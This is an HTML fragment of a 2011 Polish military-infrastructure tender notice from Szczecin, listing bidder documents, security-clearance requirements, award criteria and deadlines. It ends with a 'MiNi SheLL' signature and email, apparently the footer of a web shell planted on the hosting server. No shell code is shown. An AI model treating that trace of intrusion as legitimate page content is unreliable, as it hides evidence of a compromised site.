<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o posiadaniu Świadectwa Bezpieczeństwa Przemysłowego I stopnia.

2. Wykaz osób, określonych w części VII SIWZ ust. 1 pkt. 3 posiadających ważne ważne poświadczenia bezpieczeństwa, które upoważniają do dostępu do informacji niejawnych o klauzuli co najmniej POUFNE oraz zaświadczenia o odbyciu szkolenia z zasad ochrony informacji niejawnych (na podstawie Ustawy z dnia 05.08.2010 r. o ochronie informacji niejawnych - art.14, 15) obejmujący: 
a) kierownika firmy, 
b) pełnomocnika ds. ochrony informacji niejawnych, 
c) min. 1 osobę  posiadającą uprawnienia projektowe w specjalności architektonicznej 
d) min. 1 osobę  posiadającą uprawnienia  projektowe w specjalności instalacyjnej w zakresie sieci,  instalacji i urządzeń elekrtycznych i elektroenergetycznych 
 e) min. 1 osobę  posiadającą uprawnienia  projektowe w specjalności konstrukcyjno- budowlanej 
f) min. 1 osobę posiadająca uprawnienia geodezyjne, 
g) min. 2 osoby posiadające świadectwo ukończenia kursu w zakresie projektowania systemów alarmowych klasy SA-4, 

Wykaz ma zawierać numery poświadczeń bezpieczeństwa i datę ich ważności, oraz numery zaświadczeń stwierdzających odbycie szkolenia w zakresie ochrony informacji niejawnych w/w osób. Ponadto do wykazu należy załączyć oświadczenie, iż wszystkie w/w osoby posiadają ważne poświadczenia bezpieczeństwa do poziomu co najmniej POUFNE oraz odbyły przeszkolenie w zakresie ochrony informacji niejawnych (wzór załącznik nr 5 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy może nastąpić w przypadku:

1)	Urzędowej zmiany wysokości podatku VAT
2)	Zmiany terminu realizacji w przypadku wystąpienia nieprzewidywalnych, koniecznych do wykonania zadania usług  poprzez udzielenie zamówień dodatkowych.
3)	Zmiany wartości wynagrodzenia w przypadku usług zaniechanych 
4)	Zmiany limitu finansowego w danym roku budżetowym
5)	Zmiany wynikające z błędów projektowych
6)	Zmiany spowodowane okolicznościami siły wyższej lub powstałe z winy osób trzecich.
7)	Zmiany w przepisach ustawowych i aktach wykonawczych związanych z przedmiotem zamówienia, które nastąpiły po dniu zawarcia umowy

 - w przypadku wystąpienia sytuacji powodujących konieczność wprowadzenia takich zmian,
    zostaną wprowadzone do umowy aneksem na warunkach uzgodnionych przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.rzi.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, Narutowicza 17B, 70-240 Szczecin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2011 godzina 10:00, miejsce: kancelaria Rejonowego Zarządu  Infrastruktury w  Szczecinie -  pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com